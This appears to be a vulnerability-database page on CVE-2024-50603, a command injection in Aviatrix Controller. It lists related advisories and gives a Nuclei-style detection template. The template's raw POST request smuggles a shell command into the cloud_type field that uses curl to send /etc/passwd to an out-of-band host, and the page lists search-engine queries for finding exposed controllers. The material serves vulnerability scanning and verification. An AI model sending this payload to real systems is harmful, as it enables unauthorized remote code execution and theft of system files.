| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
| Exploit for OS Command Injection in Aviatrix Controller | 8 Jan 202512:00 | – | githubexploit | |
| Exploit for OS Command Injection in Aviatrix Controller | 12 Jan 202511:20 | – | githubexploit | |
| CVE-2024-50603 | 8 Jan 202500:00 | – | attackerkb | |
| Aviatrix Controllers < 7.1.4191 / 7.2 < 7.2.4996 RCE | 23 Oct 202500:00 | – | nessus | |
| The vulnerability of the Aviatrix Controller software, a cloud infrastructure management tool, arises from the lack of measures to neutralize specific elements, allowing a perpetrator to execute arbitrary code. | 21 Jan 202500:00 | – | bdu_fstec | |
| CVE-2024-50603 | 8 Jan 202501:09 | – | circl | |
| Aviatrix Controllers OS Command Injection Vulnerability | 16 Jan 202500:00 | – | cisa_kev | |
| CISA Adds One Known Exploited Vulnerability to Catalog | 16 Jan 202512:00 | – | cisa | |
| Aviatrix Controller 操作系统命令注入漏洞 | 8 Jan 202500:00 | – | cnnvd | |
| CVE-2024-50603 | 8 Jan 202500:00 | – | cve |
id: CVE-2024-50603
info:
name: Aviatrix Controller - Remote Code Execution
author: newlinesec,securing.pl
severity: critical
description: |
An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud_type for list_flightpath_destination_instances, or src_cloud_type for flightpath_connection_test.
impact: |
Attackers can exploit vulnerabilities to compromise the system.
remediation: |
Update to the latest patched version addressing CVE-2024-50603.
reference:
- https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/
- https://docs.aviatrix.com/documentation/latest/network-security/index.html
- https://docs.aviatrix.com/documentation/latest/release-notices/psirt-advisories/psirt-advisories.html?expand=true#remote-code-execution-vulnerability-in-aviatrix-controllers
- https://nvd.nist.gov/vuln/detail/CVE-2024-50603
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-50603
cwe-id: CWE-78
epss-score: 0.98545
epss-percentile: 0.99916
metadata:
verified: true
max-request: 1
vendor: aviatrix
product: controller
shodan-query:
- http.title:"aviatrix controller"
- http.title:"aviatrix cloud controller"
fofa-query:
- app="aviatrix-controller"
- title="aviatrix cloud controller"
google-query: intitle:"aviatrix cloud controller"
zoomeye-query: app="Aviatrix Controller"
tags: cve,cve2024,aviatrix,controller,rce,oast,kev,vkev,vuln
variables:
oast: "{{interactsh-url}}"
http:
- raw:
- |
POST /v1/api HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+{{oast}})
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: status
status:
- 200
- type: regex
part: interactsh_request
regex:
- 'root:.*:0:0:'
# digest: 490a004630440220239932519285fdd4e996d79211d5149e74226e0d6fe23efa7a882d3f64719c2a02205ed1da53b39b7d40dbb48dd08c443ae136bed253f8bbfa46fff5dfb5d9eeaa0f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation